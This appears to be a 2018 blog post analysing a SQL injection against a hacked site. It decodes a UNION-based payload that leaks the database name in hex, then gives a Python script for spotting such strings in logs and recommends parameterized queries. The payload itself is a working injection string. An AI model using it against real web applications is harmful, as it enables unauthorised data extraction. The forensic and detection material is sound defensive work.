Tuesday, 26 June 2018

mysql - Site has been hacked via SQL Injection

This is not the complete query; it is the string the person entered into your web app.




First, replace each %20 with a blank space in the UNION part, and you get:



SELECT concat(0x7e,0x27,Hex(cast(database() as char)),0x27,0x7e),0x31303235343830303536,0x31303235343830303536,0x31303235343830303536--


It seems the user put the string in a place where you were expecting a number. First there is a number (999.9) to complete the original condition of the query. Then a UNION part is added.
Finally, after the UNION part, the comment characters (-- ) are added so that the rest of the query (which your system may be appending) is bypassed.



We can format the code for better understanding:




SELECT
    concat(
        0x7e,
        0x27,
        Hex(cast(database() as char)),
        0x27,
        0x7e
    ),
    0x31303235343830303536,
    0x31303235343830303536,
    0x31303235343830303536


Now, a substring of the first column of the result will contain the hex-encoded form of your database name. It should be surrounded by single quotes (0x27), which are in turn surrounded by ~ (0x7e).
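The decoding steps above can be scripted for log triage. The following is an added example, not part of the original post: it URL-decodes a logged parameter value, checks it against the number the application expected, decodes the 0x literals, and extracts a ~'<hex>'~ marker from a stored response. The sample value, the response fragment and the names triage and leaked_name are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Constructed sample, reassembled from the pieces the post describes (999.9,
# a UNION, the SELECT shown above). It is not the original logged string.
SAMPLE = (
    "999.9%20UNION%20SELECT%20concat(0x7e,0x27,Hex(cast(database()%20as%20char)),"
    "0x27,0x7e),0x31303235343830303536,0x31303235343830303536,"
    "0x31303235343830303536--%20"
)

HEX_LITERAL = re.compile(r"\b0x((?:[0-9a-fA-F]{2})+)\b")
NUMERIC = re.compile(r"[0-9]+(?:\.[0-9]+)?")
MARKER = re.compile(r"~'((?:[0-9A-Fa-f]{2})+)'~")


def triage(raw_value):
    """Decode one logged parameter value and report why it is suspicious."""
    value = unquote(raw_value)  # turns %20 back into spaces
    literals = {
        m.group(0): bytes.fromhex(m.group(1)).decode("ascii", "replace")
        for m in HEX_LITERAL.finditer(value)
    }
    return {
        "decoded": value,
        "numeric": NUMERIC.fullmatch(value) is not None,
        "union_select": bool(re.search(r"\bunion\b.+?\bselect\b", value, re.I | re.S)),
        "comment_tail": value.rstrip().endswith("--"),
        "literals": literals,
    }


def leaked_name(response_text):
    """Return the text inside a ~'<hex>'~ marker in a stored response, if any."""
    m = MARKER.search(response_text)
    return bytes.fromhex(m.group(1)).decode("utf-8", "replace") if m else None


if __name__ == "__main__":
    for key, val in triage(SAMPLE).items():
        print(f"{key}: {val}")
    # Constructed response fragment: 73686F70 is HEX('shop').
    print(leaked_name("<td>~'73686F70'~</td>"))
```

A value that fails the numeric check should be rejected before it reaches the query, and the query itself should bind the value as a parameter instead of concatenating it.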
